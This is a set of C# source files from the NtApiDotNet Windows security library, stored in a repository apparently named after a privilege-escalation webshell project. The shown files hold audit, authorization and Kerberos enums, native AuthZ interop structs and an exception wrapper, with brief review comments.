11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.ComponentModel;
17 |
18 | namespace NtApiDotNet.Win32
19 | {
/// <summary>
/// Represents an impersonation safe win32 exception, which resolves the win32 message when Message is called.
/// </summary>
// NOTE(review): the type is marked [Serializable] but declares no
// (SerializationInfo, StreamingContext) constructor - confirm whether it is ever deserialized.
[Serializable]
public class SafeWin32Exception : Win32Exception
{
    /// <summary>
    /// Constructor.
    /// </summary>
    public SafeWin32Exception()
    {
    }

    /// <summary>
    /// Constructor.
    /// </summary>
    /// <param name="error">Win32 error.</param>
    public SafeWin32Exception(int error)
        : base(error)
    {
    }

    /// <summary>
    /// Constructor taking the library's Win32Error enumeration; the value is cast to int.
    /// </summary>
    /// <param name="error">Win32 error.</param>
    internal SafeWin32Exception(Win32Error error)
        : this((int)error)
    {
    }

    /// <summary>
    /// The message for the exception.
    /// </summary>
    /// <remarks>
    /// A fresh Win32Exception is built from NativeErrorCode on every read, so the text is
    /// looked up when the property is accessed rather than when this exception was constructed.
    /// </remarks>
    public override string Message
    {
        get { return new Win32Exception(NativeErrorCode).Message; }
    }
}
58 | }
59 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Audit/AuditAccessRights.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Audit
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Access rights for system audit policy.
/// </summary>
public enum AuditAccessRights : uint
{
    // Rights specific to the audit policy object.
    SetSystemPolicy = 0x0001,
    QuerySystemPolicy = 0x0002,
    SetUserPolicy = 0x0004,
    QueryUserPolicy = 0x0008,
    EnumerateUsers = 0x0010,
    SetMiscPolicy = 0x0020,
    QueryMiscPolicy = 0x0040,

    // Every audit-specific right plus the standard rights declared further down.
    All = WriteOwner
        | WriteDac
        | ReadControl
        | Delete
        | SetSystemPolicy
        | QuerySystemPolicy
        | SetUserPolicy
        | QueryUserPolicy
        | EnumerateUsers
        | SetMiscPolicy
        | QueryMiscPolicy,

    // Values re-exported from GenericAccessRights.
    GenericRead = GenericAccessRights.GenericRead,
    GenericWrite = GenericAccessRights.GenericWrite,
    GenericExecute = GenericAccessRights.GenericExecute,
    GenericAll = GenericAccessRights.GenericAll,
    Delete = GenericAccessRights.Delete,
    ReadControl = GenericAccessRights.ReadControl,
    WriteDac = GenericAccessRights.WriteDac,
    WriteOwner = GenericAccessRights.WriteOwner,
    MaximumAllowed = GenericAccessRights.MaximumAllowed,
    AccessSystemSecurity = GenericAccessRights.AccessSystemSecurity,
}
43 | }
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Audit/AuditGlobalSaclType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Audit
16 | {
/// <summary>
/// Type of global SACL to query or set.
/// </summary>
public enum AuditGlobalSaclType
{
    /// <summary>
    /// File type.
    /// </summary>
    File = 0,

    /// <summary>
    /// Key type.
    /// </summary>
    Key = 1
}
31 | }
32 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Audit/AuditPolicyEventType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Audit
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Policy audit event type.
/// </summary>
// Values are written out explicitly; they are the same consecutive numbers the
// implicit numbering produced.
public enum AuditPolicyEventType
{
    System = 0,
    Logon = 1,
    ObjectAccess = 2,
    PrivilegeUse = 3,
    DetailedTracking = 4,
    PolicyChange = 5,
    AccountManagement = 6,
    DirectoryServiceAccess = 7,
    AccountLogon = 8
}
33 | }
34 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/AuthenticationCredentials.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet.Win32.Security.Authentication
18 | {
/// <summary>
/// Base class for authentication credentials.
/// </summary>
public abstract class AuthenticationCredentials
{
    /// <summary>
    /// Converts the credentials to a native buffer.
    /// </summary>
    /// <param name="list">Disposable list supplied by the caller; presumably tracks any
    /// resources allocated during the conversion - confirm against implementations.</param>
    /// <param name="package">The authentication package name.</param>
    /// <returns>The buffer holding the credentials.</returns>
    // NOTE(review): the returned buffer may hold secret material; callers should make sure it is disposed.
    internal abstract SafeBuffer ToBuffer(
        DisposableList list,
        string package);
}
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/AuthenticationImpersonationContext.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 |
18 | namespace NtApiDotNet.Win32.Security.Authentication
19 | {
/// <summary>
/// Impersonation context for a server authentication.
/// </summary>
public struct AuthenticationImpersonationContext : IDisposable
{
    // Security context handle that is reverted on dispose.
    private readonly SecHandle _context;

    /// <summary>
    /// Stores the security context to revert later.
    /// </summary>
    /// <param name="context">The security context handle.</param>
    internal AuthenticationImpersonationContext(SecHandle context)
    {
        _context = context;
    }

    /// <summary>
    /// Reverts the impersonation by calling RevertSecurityContext.
    /// </summary>
    // NOTE(review): the result of RevertSecurityContext is discarded, so a failed revert is
    // not reported to the caller. A default-initialized instance of this struct would also
    // pass an unset context here - confirm both are acceptable.
    void IDisposable.Dispose() => SecurityNativeMethods.RevertSecurityContext(_context);
}
37 | }
38 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/IAuthenticationContext.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication
16 | {
/// <summary>
/// Interface for authentication contexts.
/// </summary>
public interface IAuthenticationContext
{
    /// <summary>
    /// The current authentication token.
    /// </summary>
    AuthenticationToken Token
    {
        get;
    }

    /// <summary>
    /// Whether the authentication is done.
    /// </summary>
    bool Done
    {
        get;
    }

    /// <summary>
    /// Expiry of the authentication.
    /// </summary>
    // NOTE(review): the unit and epoch of this value are not stated here - confirm before comparing it with a clock.
    long Expiry
    {
        get;
    }
}
37 | }
38 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/Kerberos/KRB_CHKSUM_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication.Kerberos
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Kerberos Checksum Type.
/// </summary>
// The CRC32, MD4, MD5 and DES based entries name legacy algorithms; presumably they are
// listed so that received data can be decoded, not as a recommendation to use them.
public enum KRB_CHKSUM_TYPE
{
    NONE = 0,

    // Non-negative identifiers.
    CRC32 = 1,
    RSA_MD4 = 2,
    RSA_MD4_DES = 3,
    DES_MAC = 4,
    DES_MAC_K = 5,
    RSA_MD4_DES_K = 6,
    RSA_MD5 = 7,
    RSA_MD5_DES = 8,
    RSA_MD5_DES3 = 9,
    SHA1_OTHER = 10,
    HMAC_SHA1_DES3 = 12,
    SHA1 = 14,
    HMAC_SHA1_96_AES_128 = 15,
    HMAC_SHA1_96_AES_256 = 16,
    GSSAPI = 32771,

    // Negative identifiers.
    HMAC_MD5 = -138,
    HMAC_MD5_ENC = -1138
}
42 | }
43 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/Kerberos/KRB_ENC_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication.Kerberos
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Kerberos Encryption Type.
/// </summary>
// Defender note: the DES and RC4 ("ARCFOUR") encryption types are deprecated for
// Kerberos (RFC 6649, RFC 8429). Seeing them in tickets where AES is available is
// commonly treated as a hardening gap and a detection signal.
public enum KRB_ENC_TYPE
{
    NULL = 0,

    // Non-negative identifiers.
    DES_CBC_CRC = 1,
    DES_CBC_MD4 = 2,
    DES_CBC_MD5 = 3,
    DES3_CBC_MD5 = 5,
    OLD_DES3_CBC_SHA1 = 7,
    SIGN_DSA_GENERATE = 8,
    ENCRYPT_RSA_PRIV = 9,
    ENCRYPT_RSA_PUB = 10,
    DES3_CBC_SHA1 = 16,
    AES128_CTS_HMAC_SHA1_96 = 17,
    AES256_CTS_HMAC_SHA1_96 = 18,
    ARCFOUR_HMAC_MD5 = 23,
    ARCFOUR_HMAC_MD5_56 = 24,
    ENCTYPE_PK_CROSS = 48,

    // Negative identifiers.
    ARCFOUR_MD4 = -128,
    ARCFOUR_HMAC_OLD = -133,
    ARCFOUR_HMAC_OLD_EXP = -135,
    DES_CBC_NONE = -4096,
    DES3_CBC_NONE = -4097,
    DES_CFB64_NONE = -4098,
    DES_PCBC_NONE = -4099,
    DIGEST_MD5_NONE = -4100,
    CRAM_MD5_NONE = -4101
}
48 | }
49 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/Kerberos/KRB_MSG_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication.Kerberos
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Kerberos Message Type.
/// </summary>
public enum KRB_MSG_TYPE
{
    // Authentication service exchange.
    KRB_AS_REQ = 10,
    KRB_AS_REP = 11,

    // Ticket-granting service exchange.
    KRB_TGS_REQ = 12,
    KRB_TGS_REP = 13,

    // Application exchange.
    KRB_AP_REQ = 14,
    KRB_AP_REP = 15,

    // TGT request and reply.
    KRB_TGT_REQ = 16,
    KRB_TGT_REP = 17,

    // Remaining message types.
    KRB_SAFE = 20,
    KRB_PRIV = 21,
    KRB_CRED = 22,
    KRB_ERROR = 30,
}
36 | }
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authentication/Kerberos/KRB_NAME_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authentication.Kerberos
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Kerberos Name Type.
/// </summary>
public enum KRB_NAME_TYPE
{
    // Non-negative identifiers.
    UNKNOWN = 0,
    PRINCIPAL = 1,
    SRV_INST = 2,
    SRV_HST = 3,
    SRV_XHST = 4,
    UID = 5,
    X500_PRINCIPAL = 6,
    SMTP_NAME = 7,
    ENTERPRISE_PRINCIPAL = 10,

    // Negative identifiers.
    ENT_PRINCIPAL_AND_ID = -130,
    MS_PRINCIPAL = -128,
    MS_PRINCIPAL_AND_ID = -129
}
36 | }
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authorization/AuthZAccessCheckResult.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Win32.Security.Authorization
18 | {
/// <summary>
/// Access check result from AuthZ.
/// </summary>
public class AuthZAccessCheckResult : AccessCheckResultGeneric
{
    /// <summary>
    /// Builds the result from the raw AuthZ reply values.
    /// </summary>
    /// <param name="type">The NT type; supplies the generic mapping and the access rights type.</param>
    /// <param name="error">The Win32 error from the check; mapped to a status for the base class.</param>
    /// <param name="granted_access">The granted access mask.</param>
    /// <param name="object_type">Optional object type entry; when null an empty GUID and name are used.</param>
    // The arguments are passed positionally to the AccessCheckResultGeneric constructor, which
    // is not shown here. `type` is dereferenced without a null check.
    internal AuthZAccessCheckResult(
        NtType type,
        Win32Error error,
        AccessMask granted_access,
        ObjectTypeEntry object_type)
        : base(
            error.MapDosErrorToStatus(),
            granted_access,
            type.GenericMapping.UnmapMask(granted_access),
            new TokenPrivilege[0],
            granted_access.ToSpecificAccess(type.AccessRightsType),
            type.GenericMapping.UnmapMask(granted_access).ToSpecificAccess(type.AccessRightsType),
            object_type?.ObjectType ?? Guid.Empty,
            object_type?.Name ?? string.Empty,
            false)
    {
        Error = error;
    }

    /// <summary>
    /// The Win32 error code from the access check.
    /// </summary>
    public Win32Error Error { get; }
}
42 | }
43 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authorization/ProgressInvokeSetting.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authorization
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Progress invoke setting for tree security.
/// </summary>
// Values are written out explicitly; they are the same consecutive numbers the
// implicit numbering produced, starting at 1.
public enum ProgressInvokeSetting
{
    InvokeNever = 1,
    EveryObject = 2,
    OnError = 3,
    CancelOperation = 4,
    RetryOperation = 5,
    PrePostError = 6
}
30 | }
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authorization/SeObjectType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authorization
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Enumeration for object type.
/// </summary>
// Values are written out explicitly; they are the same consecutive numbers the
// implicit numbering produced.
public enum SeObjectType
{
    Unknown = 0,
    File = 1,
    Service = 2,
    Printer = 3,
    RegistryKey = 4,
    LMShare = 5,
    Kernel = 6,
    Window = 7,
    Ds = 8,
    DsAll = 9,
    ProviderDefined = 10,
    WmiGuid = 11,
    RegistryWow6432Key = 12,
    RegistryWow6464Key = 13
}
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Authorization/TreeSecInfo.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Security.Authorization
16 | {
17 | #pragma warning disable 1591
/// <summary>
/// Tree security mode.
/// </summary>
public enum TreeSecInfo
{
    /// <summary>Mode value 1.</summary>
    Set = 1,

    /// <summary>Mode value 2.</summary>
    Reset = 2,

    /// <summary>Mode value 3.</summary>
    ResetKeepExplicit = 3
}
27 |
/// <summary>
/// Progress function for tree named security info.
/// </summary>
/// <param name="object_name">The name of the object.</param>
/// <param name="status">The operation status.</param>
/// <param name="invoke_setting">The current invoke setting.</param>
/// <param name="security_set">True if security is set.</param>
/// <returns>The invoke setting. Return original invoke_setting if no change.</returns>
public delegate ProgressInvokeSetting TreeProgressFunction(
    string object_name,
    Win32Error status,
    ProgressInvokeSetting invoke_setting,
    bool security_set);
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AUDIT_POLICY_INFORMATION.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
// Interop structure with sequential layout: the field order below defines the
// in-memory layout and must not be rearranged.
[StructLayout(LayoutKind.Sequential)]
internal struct AUDIT_POLICY_INFORMATION
{
    // GUID of the audit subcategory.
    public Guid AuditSubCategoryGuid;

    // Auditing information value for the subcategory.
    public int AuditingInformation;

    // GUID of the audit category.
    public Guid AuditCategoryGuid;
}
27 | }
28 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AUTHZ_ACCESS_REPLY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Win32.Security.Native
19 | {
// Interop structure with sequential layout: the field order below defines the
// in-memory layout and must not be rearranged.
// NOTE(review): the three pointers presumably refer to caller-allocated arrays of
// ResultListLength entries; confirm callers size them accordingly before the native call.
[StructLayout(LayoutKind.Sequential)]
internal struct AUTHZ_ACCESS_REPLY
{
    public int ResultListLength;

    // PACCESS_MASK.
    public IntPtr GrantedAccessMask;

    // PDWORD
    public IntPtr SaclEvaluationResults;

    // PDWORD
    public IntPtr Error;
}
28 | }
29 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AUTHZ_ACCESS_REQUEST.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the Win32 AUTHZ_ACCESS_REQUEST structure describing
    /// what access is being asked for in an AuthZ access check.
    /// </summary>
    /// <remarks>
    /// Pointer fields are unmanaged memory owned by the caller and must stay
    /// valid (and pinned, if they reference managed data) for the duration of
    /// the native call.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct AUTHZ_ACCESS_REQUEST
    {
        public AccessMask DesiredAccess;  // Access rights being requested.
        public IntPtr PrincipalSelfSid;   // PSID, may be IntPtr.Zero.
        public IntPtr ObjectTypeList;     // Pointer to an object type list array, may be IntPtr.Zero.
        public int ObjectTypeListLength;  // Element count for ObjectTypeList; must match the allocation.
        public IntPtr OptionalArguments;  // PVOID; meaning is defined by the caller's resource manager.
    }
}
30 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AUTHZ_CONTEXT_INFORMATION_CLASS.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Information classes that can be queried from an AuthZ client context.
    /// </summary>
    /// <remarks>
    /// Only the first member has an explicit value; the rest are numbered
    /// implicitly, so inserting or reordering members changes the values
    /// passed to the native API.
    /// </remarks>
    internal enum AUTHZ_CONTEXT_INFORMATION_CLASS
    {
        AuthzContextInfoUserSid = 1,
        AuthzContextInfoGroupsSids,         // 2
        AuthzContextInfoRestrictedSids,     // 3
        AuthzContextInfoPrivileges,         // 4
        AuthzContextInfoExpirationTime,     // 5
        AuthzContextInfoServerContext,      // 6
        AuthzContextInfoIdentifier,         // 7
        AuthzContextInfoSource,             // 8
        AuthzContextInfoAll,                // 9
        AuthzContextInfoAuthenticationId,   // 10
        AuthzContextInfoSecurityAttributes, // 11
        AuthzContextInfoDeviceSids,         // 12
        AuthzContextInfoUserClaims,         // 13
        AuthzContextInfoDeviceClaims,       // 14
        AuthzContextInfoAppContainerSid,    // 15
        AuthzContextInfoCapabilitySids      // 16
    }
}
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/AuthZAccessCheckFlags.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Flags for an AuthZ access check call.
    /// </summary>
    [Flags]
    internal enum AuthZAccessCheckFlags
    {
        None = 0,
        // With this flag the native side keeps a reference to the caller's
        // security descriptor instead of copying it, so the descriptor must
        // outlive any cached access-check handle that refers to it.
        NoDeepCopySD = 1,
    }
}
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/CENTRAL_ACCESS_POLICY.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed mirror of the native CENTRAL_ACCESS_POLICY structure.
    /// </summary>
    /// <remarks>
    /// CAPEs/CAPECount form a pointer-plus-count pair read from unmanaged
    /// memory. Code that walks the array should treat CAPECount as untrusted
    /// until checked (non-negative, sane upper bound) and must not use the
    /// pointers after the buffer that holds this structure has been freed.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct CENTRAL_ACCESS_POLICY
    {
